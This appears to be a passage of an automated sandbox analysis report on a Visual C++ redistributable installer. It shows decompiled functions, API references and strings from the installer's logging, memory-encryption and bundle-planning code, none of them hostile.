                                                                          0x00014844
                                                                          0x00014846
                                                                          0x00014854
                                                                          0x00014859
                                                                          0x00000000
                                                                          0x00014859
                                                                          0x00014810
                                                                          0x00014810
                                                                          0x00014941
                                                                          0x00014941
                                                                          0x00014942
                                                                          0x00014948
                                                                          0x0001494b
                                                                          0x00014951
                                                                          0x00014956
                                                                          0x00014959
                                                                          0x0001495b
                                                                          0x0001495b
                                                                          0x00014963
                                                                          0x00014968
                                                                          0x00014971
                                                                          0x00014971
                                                                          0x0001497f

                                                                          APIs
                                                                          • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,0001535E,?,?,?,?), ref: 0001481A
                                                                          • GetLastError.KERNEL32(?,?,?,0001535E,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0001482B
                                                                          • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00014968
                                                                          • CloseHandle.KERNEL32(?,?,?,?,0001535E,?,?,?,?,?,?,?,?,?,?,?), ref: 00014971
                                                                          Strings
                                                                          • Failed to create the message window., xrefs: 000148C6
                                                                          • comres.dll, xrefs: 000148D7
                                                                          • user.cpp, xrefs: 0001484F, 00014898
                                                                          • Failed to connect to unelevated process., xrefs: 00014810
                                                                          • Failed to pump messages from parent process., xrefs: 0001493C
                                                                          • Failed to allocate thread local storage for logging., xrefs: 00014859
                                                                          • Failed to set elevated pipe into thread local storage for logging., xrefs: 000148A2
                                                                          • @Met, xrefs: 0001482B, 00014874
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                          • String ID: @Met$Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$user.cpp
                                                                          • API String ID: 687263955-3997268840
                                                                          • Opcode ID: 141fd93809a9456fd9aec30df892af74b2b4f24e1a02c2d5d7dddc8a08b52b54
                                                                          • Instruction ID: 41068c4e20bc0c746b7025d2705a2249a5f1e2fb1646d7b41c57443160356f01
                                                                          • Opcode Fuzzy Hash: 141fd93809a9456fd9aec30df892af74b2b4f24e1a02c2d5d7dddc8a08b52b54
                                                                          • Instruction Fuzzy Hash: 384194B2A00615BBEB119BB5CC86EEFB6ACFF04711F100226FE05E6151DB70AD5587E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000239FD Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E000239FD(void* __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				short _v528;
				short* _v532;
				int _v536;
				char _v540;
				char _v544;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t29;
				long _t39;
				signed short _t54;
				intOrPtr _t57;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t70;
				signed int _t72;
				signed int _t76;

				_t65 = __edi;
				_t64 = __edx;
				_t29 =  *0x7a008; // 0xfbf51acb
				_v8 = _t29 ^ _t76;
				_t57 = _a4;
				E0003F670(__edi,  &_v528, 0, 0x208);
				_v544 = 0;
				_v532 = 0;
				_v540 = 0;
				_v536 = 0;
				if(GetTempPathW(0x104,  &_v528) != 0) {
					_t70 = E00011C57( &_v528, 0x104,  &_v540);
					if(_t70 >= 0) {
						_t39 = GetCurrentProcessId();
						__imp__ProcessIdToSessionId(_t39,  &_v544, _t65);
						if(_t39 == 0) {
							_t66 = _v540;
							goto L12;
						} else {
							_t70 = E00011F20( &_v532, L"%u\\", _v544);
							if(_t70 >= 0) {
								_t70 = E00011C57(_v532, 0x7fffffff,  &_v536);
								if(_t70 >= 0) {
									_t67 = _v540;
									_t72 = _t67 - _v536;
									CompareStringW(0, 0,  &(( &_v528)[_t72]), _v536, _v532, _v536);
									_t66 =  ==  ? _t72 : _t67;
									L12:
									_t70 = E000121A5(_t57,  &_v528, _t66);
									if(_t70 < 0) {
										_push("Failed to copy temp folder.");
										goto L14;
									}
								} else {
									_push("Failed to get length of session id string.");
									goto L14;
								}
							} else {
								_push("Failed to format session id as a string.");
								L14:
								_push(_t70);
								E0005012F();
							}
						}
						_pop(_t65);
					} else {
						_push("Failed to get length of temp folder.");
						goto L2;
					}
				} else {
					_t54 = GetLastError();
					_t75 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					_t70 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "logging.cpp", 0x271, _t70);
					_push("Failed to get temp folder.");
					L2:
					_push(_t70);
					E0005012F();
				}
				if(_v532 != 0) {
					E000554EF(_v532);
				}
				return E0003DE36(_t57, _v8 ^ _t76, _t64, _t65, _t70);
			}























                                                                          0x000239fd
                                                                          0x000239fd
                                                                          0x00023a06
                                                                          0x00023a0d
                                                                          0x00023a11
                                                                          0x00023a24
                                                                          0x00023a2c
                                                                          0x00023a38
                                                                          0x00023a3e
                                                                          0x00023a44
                                                                          0x00023a59
                                                                          0x00023aaf
                                                                          0x00023ab3
                                                                          0x00023ac4
                                                                          0x00023acb
                                                                          0x00023ad3
                                                                          0x00023b60
                                                                          0x00000000
                                                                          0x00023ad9
                                                                          0x00023af0
                                                                          0x00023af7
                                                                          0x00023b17
                                                                          0x00023b1b
                                                                          0x00023b2a
                                                                          0x00023b3e
                                                                          0x00023b52
                                                                          0x00023b5b
                                                                          0x00023b66
                                                                          0x00023b74
                                                                          0x00023b78
                                                                          0x00023b7a
                                                                          0x00000000
                                                                          0x00023b7a
                                                                          0x00023b1d
                                                                          0x00023b1d
                                                                          0x00000000
                                                                          0x00023b1d
                                                                          0x00023af9
                                                                          0x00023af9
                                                                          0x00023b7f
                                                                          0x00023b7f
                                                                          0x00023b80
                                                                          0x00023b86
                                                                          0x00023af7
                                                                          0x00023b87
                                                                          0x00023ab5
                                                                          0x00023ab5
                                                                          0x00000000
                                                                          0x00023ab5
                                                                          0x00023a5b
                                                                          0x00023a5b
                                                                          0x00023a6c
                                                                          0x00023a76
                                                                          0x00023a84
                                                                          0x00023a89
                                                                          0x00023a8e
                                                                          0x00023a8e
                                                                          0x00023a8f
                                                                          0x00023a95
                                                                          0x00023b8f
                                                                          0x00023b97
                                                                          0x00023b97
                                                                          0x00023bad

                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00023A51
                                                                          • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00023A5B
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00023AC4
                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00023ACB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentErrorLastPathSessionTemp
                                                                          • String ID: %u\$@Met$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                          • API String ID: 1726527325-8456610
                                                                          • Opcode ID: 4ce0ce029314d27fbaef3c26480270351ceb99b86b012d45ce480a0ce2d85372
                                                                          • Instruction ID: 2ae783d3a644e7636d2bc4dcf6f3a73f3c61002c1f57a6ef031614a07cbe2a2e
                                                                          • Opcode Fuzzy Hash: 4ce0ce029314d27fbaef3c26480270351ceb99b86b012d45ce480a0ce2d85372
                                                                          • Instruction Fuzzy Hash: 8541A472D8123DABDB219A649C49FDAB7B8EB14710F100195EA08A7141D7749F808BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004FBAD Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 74libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 81%
                                                                          			E0004FBAD() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				void* _t8;
				void* _t13;

				_t13 = E000137D6(L"AdvApi32.dll", 0x7b5e8);
				if(_t13 < 0) {
					_t2 =  *0x7b5f4; // 0x0
				} else {
					 *0x7b5f0 = GetProcAddress( *0x7b5e8, "SystemFunction040");
					_t2 = GetProcAddress( *0x7b5e8, "SystemFunction041");
					 *0x7b5f4 = _t2;
				}
				if( *0x7b5f0 == 0 || _t2 == 0) {
					_t13 = E000137D6(L"Crypt32.dll", 0x7b5ec);
					if(_t13 >= 0) {
						_t5 = GetProcAddress( *0x7b5ec, "CryptProtectMemory");
						 *0x7b5f8 = _t5;
						if( *0x7b5f0 != 0 || _t5 != 0) {
							_t6 = GetProcAddress( *0x7b5ec, "CryptUnprotectMemory");
							 *0x7b5fc = _t6;
							if( *0x7b5f4 != 0 || _t6 != 0) {
								goto L13;
							} else {
								_t16 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
								_t8 = 0x80004005;
								_t13 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
								_push(_t13);
								_push(0x2d);
								goto L9;
							}
						} else {
							_t19 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
							_t8 = 0x80004005;
							_t13 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
							_push(_t13);
							_push(0x28);
							L9:
							_push("cryputil.cpp");
							E000137D3(_t8);
						}
					}
				} else {
					L13:
					 *0x7b600 = 1;
				}
				return _t13;
			}








                                                                          0x0004fbc4
                                                                          0x0004fbc8
                                                                          0x0004fbf0
                                                                          0x0004fbca
                                                                          0x0004fbe2
                                                                          0x0004fbe7
                                                                          0x0004fbe9
                                                                          0x0004fbe9
                                                                          0x0004fbfc
                                                                          0x0004fc15
                                                                          0x0004fc19
                                                                          0x0004fc2a
                                                                          0x0004fc33
                                                                          0x0004fc38
                                                                          0x0004fc76
                                                                          0x0004fc7f
                                                                          0x0004fc84
                                                                          0x00000000
                                                                          0x0004fc8a
                                                                          0x0004fc9b
                                                                          0x0004fc9e
                                                                          0x0004fca5
                                                                          0x0004fca8
                                                                          0x0004fca9
                                                                          0x00000000
                                                                          0x0004fca9
                                                                          0x0004fc3e
                                                                          0x0004fc4f
                                                                          0x0004fc52
                                                                          0x0004fc59
                                                                          0x0004fc5c
                                                                          0x0004fc5d
                                                                          0x0004fc5f
                                                                          0x0004fc5f
                                                                          0x0004fc64
                                                                          0x0004fc64
                                                                          0x0004fc38
                                                                          0x0004fcad
                                                                          0x0004fcad
                                                                          0x0004fcad
                                                                          0x0004fcad
                                                                          0x0004fcbb

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(SystemFunction040,AdvApi32.dll), ref: 0004FBD5
                                                                          • GetProcAddress.KERNEL32(SystemFunction041), ref: 0004FBE7
                                                                          • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0004FC2A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0004FC3E
                                                                          • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0004FC76
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0004FC8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLast
                                                                          • String ID: @Met$AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                          • API String ID: 4214558900-313144314
                                                                          • Opcode ID: a13ed5c78d970f243a7dd0f78e5c3e790b8f74fa8cca3f11a7b59948953aad76
                                                                          • Instruction ID: bef039776b4f119420b015a89b2fced616c9e6bed3e1786e09bfe9236089dffd
                                                                          • Opcode Fuzzy Hash: a13ed5c78d970f243a7dd0f78e5c3e790b8f74fa8cca3f11a7b59948953aad76
                                                                          • Instruction Fuzzy Hash: 1F21C2B1E40F279EF7216B66AE48B7279D0AB00750F024131ED09FA1A1E77DDC808A98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00022DDC Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 303COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00022DDC(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t92;
				intOrPtr* _t93;
				intOrPtr _t98;
				intOrPtr* _t104;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				intOrPtr _t132;
				intOrPtr _t142;
				intOrPtr* _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr* _t157;
				void* _t158;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr _t164;
				void* _t166;

				_t158 = __edi;
				_t143 = __ecx;
				_t142 = _a8;
				_t156 = 0;
				_t162 = 0;
				_v16 = 0;
				_v8 = 0;
				_t4 = _t142 + 0xc0; // 0x2e002d
				_t88 =  *_t4;
				_v20 = 0;
				_v12 = 0;
				if( *_t4 == 0) {
					L7:
					_v32 = _t156;
					__eflags =  *((intOrPtr*)(_t142 + 0xb8)) - _t156;
					if( *((intOrPtr*)(_t142 + 0xb8)) <= _t156) {
						L69:
						if(_v12 != 0) {
							E00055450(_t158, _v12);
						}
						if(_v16 != 0) {
							E00012647(_v16, _v20);
						}
						return _t162;
					}
					_t92 = _t156;
					_v36 = _t92;
					_push(_t158);
					do {
						_t16 = _t142 + 0xb4; // 0x280027
						_t160 =  *_t16 + _t92;
						 *((intOrPtr*)(_t160 + 0x64)) = _t156;
						 *((intOrPtr*)(_t160 + 0x68)) = _t156;
						__eflags = _v12;
						if(_v12 == 0) {
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								L15:
								_t24 = _t142 + 0xc0; // 0x2e002d
								_t93 =  *_t24;
								__eflags = _t93;
								if(_t93 == 0) {
									L25:
									_t43 = _t142 + 0x10; // 0x6c0064
									_t44 = _t160 + 0xbc; // 0x2800e3
									_t162 = E000121A5(_t44,  *_t43, _t156);
									__eflags = _t162;
									if(_t162 < 0) {
										_push("Failed to copy self to related bundle ancestors.");
										L67:
										_push(_t162);
										E0005012F();
										L68:
										_pop(_t158);
										goto L69;
									}
									L26:
									_t98 =  *_t160 - 1;
									__eflags = _t98;
									if(_t98 == 0) {
										L49:
										_t59 = _t160 + 0x68; // 0x28008f
										_t157 = _t59;
										L50:
										 *((intOrPtr*)(_t160 + 0x64)) =  *_t157;
										_t146 =  *((intOrPtr*)(_a4 + 0x10));
										_t162 = E0001D58B(_a4, 1,  *((intOrPtr*)( *_t146 + 0x50))(_t146,  *((intOrPtr*)(_t160 + 0x18)), _t157));
										_v8 = _t162;
										__eflags = _t162;
										if(_t162 < 0) {
											E000137D3(_t102, "plan.cpp", 0x500, _t162);
											_push("UX aborted plan related bundle.");
											goto L67;
										}
										_t147 =  *((intOrPtr*)(_t160 + 0x64));
										_t67 = _t160 + 0x68; // 0x28008f
										_t104 = _t67;
										__eflags =  *_t104 - _t147;
										if( *_t104 != _t147) {
											_push(E000241CD(_t147));
											_push(E000241CD( *((intOrPtr*)(_t160 + 0x68))));
											E0001550F(2, 0x200000ca,  *((intOrPtr*)(_t160 + 0x18)));
											_t166 = _t166 + 0x14;
											_t70 = _t160 + 0x68; // 0x28008f
											_t104 = _t70;
										}
										_t148 = _a16;
										_t156 = 0;
										__eflags =  *_t148 - 3;
										if( *_t148 == 3) {
											__eflags =  *_t160 - 5;
											if( *_t160 != 5) {
												goto L59;
											}
											__eflags =  *_t104;
											if( *_t104 == 0) {
												goto L59;
											}
											__eflags =  *((intOrPtr*)(_t160 + 0xa0));
											if( *((intOrPtr*)(_t160 + 0xa0)) <= 0) {
												goto L59;
											}
											_t161 =  *((intOrPtr*)(_t160 + 0x9c));
											_t74 = _t148 + 0x78; // 0x5b508
											_t76 = _t148 + 0x74; // 0x5b504
											_t162 = E00058F31(_t76, _t74,  *_t161,  *((intOrPtr*)(_t161 + 8)));
											_v8 = _t162;
											__eflags = _t162;
											if(_t162 < 0) {
												_push( *_t161);
												_push("Failed to add the package provider key \"%ls\" to the planned list.");
												L64:
												_push(_t162);
												E0005012F();
												goto L68;
											}
											L58:
											_t156 = 0;
											__eflags = 0;
										}
										goto L59;
									}
									_t113 = _t98 - 1;
									__eflags = _t113;
									if(_t113 == 0) {
										__eflags = _a12 - 2;
										if(_a12 == 2) {
											goto L49;
										}
										__eflags =  *_a16 - 3;
										if( *_a16 <= 3) {
											goto L49;
										}
										_t54 = _t142 + 0x3c; // 0x6e0072
										__eflags =  *_t54 -  *((intOrPtr*)(_t160 + 0xc));
										if(__eflags < 0) {
											L47:
											__eflags = 0;
											L48:
											_t58 = _t160 + 0x68; // 0x28008f
											_t157 = _t58;
											 *_t157 = 0;
											goto L50;
										}
										if(__eflags > 0) {
											L46:
											_push(2);
											_pop(0);
											goto L48;
										}
										_t56 = _t142 + 0x38; // 0x65006b
										__eflags =  *_t56 -  *((intOrPtr*)(_t160 + 8));
										if( *_t56 <=  *((intOrPtr*)(_t160 + 8))) {
											goto L47;
										}
										goto L46;
									}
									_t118 = _t113 - 1;
									__eflags = _t118;
									if(_t118 == 0) {
										L34:
										_t119 = _a16;
										__eflags =  *_t119 - 3;
										if( *_t119 != 3) {
											_t150 = 5;
											__eflags =  *_t119 - _t150;
											if( *_t119 == _t150) {
												L40:
												_t51 = _t160 + 0x68; // 0x28008f
												_t157 = _t51;
												 *_t157 = 4;
												goto L50;
											}
											__eflags =  *_t119 - 6;
											if( *_t119 == 6) {
												goto L40;
											}
											__eflags =  *_t119 - 7;
											_t50 = _t160 + 0x68; // 0x28008f
											_t157 = _t50;
											if( *_t119 == 7) {
												 *_t157 = _t150;
											}
											goto L50;
										}
										_t49 = _t160 + 0x68; // 0x28008f
										_t157 = _t49;
										 *_t157 = 2;
										goto L50;
									}
									_t120 = _t118 - 1;
									__eflags = _t120;
									if(_t120 == 0) {
										goto L34;
									}
									__eflags = _t120 != 1;
									if(_t120 != 1) {
										_push( *_t160);
										_t162 = 0x8000ffff;
										_push("Unexpected relation type encountered during plan: %d");
										goto L64;
									}
									__eflags = _a12 - 2;
									_t46 = _t160 + 0x68; // 0x28008f
									_t157 = _t46;
									if(_a12 != 2) {
										__eflags =  *_a16 - 3;
										if( *_a16 == 3) {
											 *_t157 = 5;
										}
									}
									goto L50;
								}
								__eflags =  *_t93 - _t156;
								if( *_t93 == _t156) {
									goto L25;
								}
								_t25 = _t142 + 0x10; // 0x6c0064
								_push( *_t25);
								_t26 = _t160 + 0xbc; // 0x2800e3
								_t162 = E00011F20(_t26, L"%ls;%ls", _t93);
								_t166 = _t166 + 0x10;
								__eflags = _t162;
								if(_t162 >= 0) {
									goto L26;
								}
								_push("Failed to copy ancestors and self to related bundle ancestors.");
								goto L67;
							}
							_v24 = _t156;
							__eflags =  *((intOrPtr*)(_t160 + 0xa0)) - _t156;
							if( *((intOrPtr*)(_t160 + 0xa0)) <= _t156) {
								L24:
								_push(E0002416A( *_t160));
								_push( *((intOrPtr*)(_t160 + 0x18)));
								_push(0x200000d5);
								L12:
								_push(2);
								E0001550F();
								_t166 = _t166 + 0x10;
								goto L58;
							}
							_t151 = _t156;
							_t164 = 1;
							_v28 = _t151;
							do {
								_t32 = _t142 + 0x44; // 0x320033
								__eflags = CompareStringW(0x7f, 1,  *( *((intOrPtr*)(_t160 + 0x9c)) + _t151), 0xffffffff,  *_t32, 0xffffffff) - 2;
								_t164 =  ==  ? 0 : _t164;
								_t132 = _v24 + 1;
								_t151 = _v28 + 0x10;
								_v24 = _t132;
								_v28 = _t151;
								__eflags = _t132 -  *((intOrPtr*)(_t160 + 0xa0));
							} while (_t132 <  *((intOrPtr*)(_t160 + 0xa0)));
							_a8 = _t164;
							_t162 = _v8;
							__eflags = _a8;
							if(_a8 == 0) {
								L14:
								_t156 = 0;
								__eflags = 0;
								goto L15;
							}
							goto L24;
						}
						_t162 = E000554A3(_t143, _v12,  *((intOrPtr*)(_t160 + 0x18)));
						_v8 = _t162;
						__eflags = _t162;
						if(_t162 < 0) {
							__eflags = _t162 - 0x80070490;
							if(_t162 != 0x80070490) {
								_push("Failed to lookup the bundle ID in the ancestors dictionary.");
								goto L67;
							}
							goto L14;
						}
						_push(E0002416A( *_t160));
						_push( *((intOrPtr*)(_t160 + 0x18)));
						_push(0x200000d6);
						goto L12;
						L59:
						_t143 = _v32 + 1;
						_t92 = _v36 + 0xf8;
						_v32 = _t143;
						_v36 = _t92;
						_t82 = _t142 + 0xb8; // 0x2a0029
						__eflags = _t143 -  *_t82;
					} while (_t143 <  *_t82);
					goto L68;
				}
				if(E0001280D(__ecx, 0,  &_v16,  &_v20, _t88, ";") >= 0) {
					_t162 = E000553DB(__ecx,  &_v12, _v16, _v20, 1);
					_v8 = _t162;
					__eflags = _t162;
					if(_t162 >= 0) {
						_t156 = 0;
						__eflags = 0;
						goto L7;
					} else {
						_push("Failed to create dictionary from ancestors array.");
						goto L3;
					}
				} else {
					_push("Failed to create string array from ancestors.");
					L3:
					_push(_t162);
					E0005012F();
					goto L69;
				}
			}

































                                                                          0x00022ddc
                                                                          0x00022ddc
                                                                          0x00022de3
                                                                          0x00022de6
                                                                          0x00022de9
                                                                          0x00022deb
                                                                          0x00022dee
                                                                          0x00022df1
                                                                          0x00022df1
                                                                          0x00022df7
                                                                          0x00022dfa
                                                                          0x00022dff
                                                                          0x00022e4f
                                                                          0x00022e4f
                                                                          0x00022e52
                                                                          0x00022e58
                                                                          0x0002313c
                                                                          0x00023140
                                                                          0x00023145
                                                                          0x00023145
                                                                          0x0002314e
                                                                          0x00023156
                                                                          0x00023156
                                                                          0x00023162
                                                                          0x00023162
                                                                          0x00022e5e
                                                                          0x00022e60
                                                                          0x00022e63
                                                                          0x00022e64
                                                                          0x00022e64
                                                                          0x00022e6a
                                                                          0x00022e6c
                                                                          0x00022e6f
                                                                          0x00022e72
                                                                          0x00022e76
                                                                          0x00022f00
                                                                          0x00022f04
                                                                          0x00022ebd
                                                                          0x00022ebd
                                                                          0x00022ebd
                                                                          0x00022ec3
                                                                          0x00022ec5
                                                                          0x00022f7b
                                                                          0x00022f7c
                                                                          0x00022f7f
                                                                          0x00022f8b
                                                                          0x00022f8d
                                                                          0x00022f8f
                                                                          0x0002312e
                                                                          0x00023133
                                                                          0x00023133
                                                                          0x00023134
                                                                          0x0002313b
                                                                          0x0002313b
                                                                          0x00000000
                                                                          0x0002313b
                                                                          0x00022f95
                                                                          0x00022f97
                                                                          0x00022f97
                                                                          0x00022f9a
                                                                          0x00023035
                                                                          0x00023035
                                                                          0x00023035
                                                                          0x00023038
                                                                          0x0002303d
                                                                          0x00023041
                                                                          0x00023056
                                                                          0x00023058
                                                                          0x0002305b
                                                                          0x0002305d
                                                                          0x00023122
                                                                          0x00023127
                                                                          0x00000000
                                                                          0x00023127
                                                                          0x00023063
                                                                          0x00023066
                                                                          0x00023066
                                                                          0x00023069
                                                                          0x0002306b
                                                                          0x00023073
                                                                          0x0002307c
                                                                          0x00023087
                                                                          0x0002308c
                                                                          0x0002308f
                                                                          0x0002308f
                                                                          0x0002308f
                                                                          0x00023092
                                                                          0x00023095
                                                                          0x00023097
                                                                          0x0002309a
                                                                          0x0002309c
                                                                          0x0002309f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000230a1
                                                                          0x000230a3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000230a5
                                                                          0x000230ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000230ad
                                                                          0x000230b3
                                                                          0x000230bc
                                                                          0x000230c5
                                                                          0x000230c7
                                                                          0x000230ca
                                                                          0x000230cc
                                                                          0x00023105
                                                                          0x00023107
                                                                          0x0002310c
                                                                          0x0002310c
                                                                          0x0002310d
                                                                          0x00000000
                                                                          0x00023112
                                                                          0x000230ce
                                                                          0x000230ce
                                                                          0x000230ce
                                                                          0x000230ce
                                                                          0x00000000
                                                                          0x0002309a
                                                                          0x00022fa0
                                                                          0x00022fa0
                                                                          0x00022fa3
                                                                          0x00023007
                                                                          0x0002300b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023010
                                                                          0x00023013
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023015
                                                                          0x00023018
                                                                          0x0002301b
                                                                          0x0002302c
                                                                          0x0002302c
                                                                          0x0002302e
                                                                          0x0002302e
                                                                          0x0002302e
                                                                          0x00023031
                                                                          0x00000000
                                                                          0x00023031
                                                                          0x0002301d
                                                                          0x00023027
                                                                          0x00023027
                                                                          0x00023029
                                                                          0x00000000
                                                                          0x00023029
                                                                          0x0002301f
                                                                          0x00023022
                                                                          0x00023025
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023025
                                                                          0x00022fa5
                                                                          0x00022fa5
                                                                          0x00022fa8
                                                                          0x00022fd1
                                                                          0x00022fd1
                                                                          0x00022fd4
                                                                          0x00022fd7
                                                                          0x00022fe6
                                                                          0x00022fe7
                                                                          0x00022fe9
                                                                          0x00022ffc
                                                                          0x00022ffc
                                                                          0x00022ffc
                                                                          0x00022fff
                                                                          0x00000000
                                                                          0x00022fff
                                                                          0x00022feb
                                                                          0x00022fee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ff0
                                                                          0x00022ff3
                                                                          0x00022ff3
                                                                          0x00022ff6
                                                                          0x00022ff8
                                                                          0x00022ff8
                                                                          0x00000000
                                                                          0x00022ff6
                                                                          0x00022fd9
                                                                          0x00022fd9
                                                                          0x00022fdc
                                                                          0x00000000
                                                                          0x00022fdc
                                                                          0x00022faa
                                                                          0x00022faa
                                                                          0x00022fad
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022faf
                                                                          0x00022fb2
                                                                          0x000230f7
                                                                          0x000230f9
                                                                          0x000230fe
                                                                          0x00000000
                                                                          0x000230fe
                                                                          0x00022fb8
                                                                          0x00022fbc
                                                                          0x00022fbc
                                                                          0x00022fbf
                                                                          0x00022fc4
                                                                          0x00022fc7
                                                                          0x00022fc9
                                                                          0x00022fc9
                                                                          0x00022fc7
                                                                          0x00000000
                                                                          0x00022fbf
                                                                          0x00022ecb
                                                                          0x00022ece
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ed4
                                                                          0x00022ed4
                                                                          0x00022ed8
                                                                          0x00022ee9
                                                                          0x00022eeb
                                                                          0x00022eee
                                                                          0x00022ef0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ef6
                                                                          0x00000000
                                                                          0x00022ef6
                                                                          0x00022f08
                                                                          0x00022f0c
                                                                          0x00022f12
                                                                          0x00022f66
                                                                          0x00022f6d
                                                                          0x00022f6e
                                                                          0x00022f71
                                                                          0x00022ea0
                                                                          0x00022ea0
                                                                          0x00022ea2
                                                                          0x00022ea7
                                                                          0x00000000
                                                                          0x00022ea7
                                                                          0x00022f14
                                                                          0x00022f16
                                                                          0x00022f18
                                                                          0x00022f1b
                                                                          0x00022f23
                                                                          0x00022f37
                                                                          0x00022f3d
                                                                          0x00022f43
                                                                          0x00022f44
                                                                          0x00022f47
                                                                          0x00022f4a
                                                                          0x00022f4d
                                                                          0x00022f4d
                                                                          0x00022f55
                                                                          0x00022f5b
                                                                          0x00022f5e
                                                                          0x00022f60
